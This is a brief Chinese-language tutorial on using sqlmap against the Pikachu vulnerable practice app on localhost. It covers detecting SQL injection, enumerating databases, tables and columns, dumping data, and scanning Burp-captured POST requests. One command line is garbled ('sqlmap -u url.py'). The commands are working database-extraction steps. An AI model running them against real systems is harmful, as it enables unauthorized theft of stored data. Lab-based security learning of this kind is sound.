一、基本使用
1.1 方法一(get请求)
python sqlmap.py -u "http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=vince&submit=%E6%9F%A5%E8%AF%A2" --batch
解释:-u 为目标访问url ,--batch 指的是sqlmap不会询问你的输入,全部默认确定。当你不知道要选择yes/no的时候,可以加入此参数。
出现上述页面说明存在sql注入漏洞。注入类型为盲注,数据库为mysql。我们可以获取数据库。
>>> python sqlmap.py -u url --dbs --batch 获取数据库信息
>>>python sqlmap -u url.py --current-db --batch 获取当前数据库信息
>>>python sqlmap.py -u url -D database --tables --batch 获取当前数据库的所有表信息
>>>python sqlmap.py -u url -D database -T table --columns --batch 获取数据库表字段信息
>>>python sqlmap.py -u url -D database -T table -C " column_name1,column_name2" --dump --batch 导出表字段中的内容数据。
--dump-all 导出全部(慎重,这个会导出所有表的数据)
--dump --start 1 --stop 5 选择性导出,导出前几条数据。
1.2 post请求(方法二)
如果请求参数为post,在url中不显示可结合使用burpsuit进行抓包,将抓包拦截的数据保存成txt文件直接拖至sqlmap。
>>>python sqlmap.py -r a.txt
如果有多个请求可以全部写到一个txt文件中进行扫描。